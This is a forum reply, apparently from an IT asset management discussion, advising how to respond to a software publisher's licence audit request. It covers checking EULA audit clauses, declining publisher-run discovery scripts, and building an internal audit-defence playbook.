Yes, seen these. I had a long reply, decided to shorten it more as I could babble on about this topic.
Assuming there is no voluntary or involuntary audit clause in your EULA today refuse their as not being contractual. Be kind with this approach that you simply wish to remain within the contractual terms. Next self audit to verify your within your terms in case it goes south. Be prepared for a contract “revision” to include these missing parts during a future renewal. It will come.
If it is already in your EULA voluntary or involuntary, ask for the documented process in its entirety, procedure and terms on how the request would be conducted. Make this request as part of your contract renewal, new purchases, etc. so you’re not focusing on what they might perceive as a weakness when you’re simply wanting the facts without prompting an immediate audit. Publishers will normally decline offering you their audit process citing various reasons, so you may need to push harder. If they’re on the up and up, why would you knowing the “how” be of any concern?
Concerning scripts - I’ve only had a few occasions where companies I worked for even permitted this action. Scripts normally in my experience pull more data than required to conduct legitimate license review, though there are exceptions. The concerns surround is their code good, could it harm my environment, bring services down or phone home unauthorized data to the publisher to name a few?
Lastly to your core question on strategy / defense, my advice is to craft an audit defense playbook end to end. This is a key fundamental in an ITAM program to mitigate risk. This can be a separate topic so start high level Identify your internal team (ITAM, Legal, Procurement, Business side, Senior Leadership) draft procedures, have prepared draft responses from initial notification to audit or license review closeout so you are in control of the audit and data. Keep your playbook within the team, no different that a publisher keeps their audit techniques close to their audit team. Secondly identify high risk publishers, conduct internal reviews, identify alternative products in case the relationship goes sour, also useful in negotiations.
In summary, determine if their request is legal/legitimate (in the contract). If challenged possibly they offer alternatives. Avoid running scripts due to issues cited above or those from others here on the Forum. Request or suggest an alternative for validation of your use of product that is agreeable to both parties. Develop your audit defense playbook with this topic incorporated so you have a well thought out runbook.
Hope this helps, let’s see what others here may offer as well
Cheers
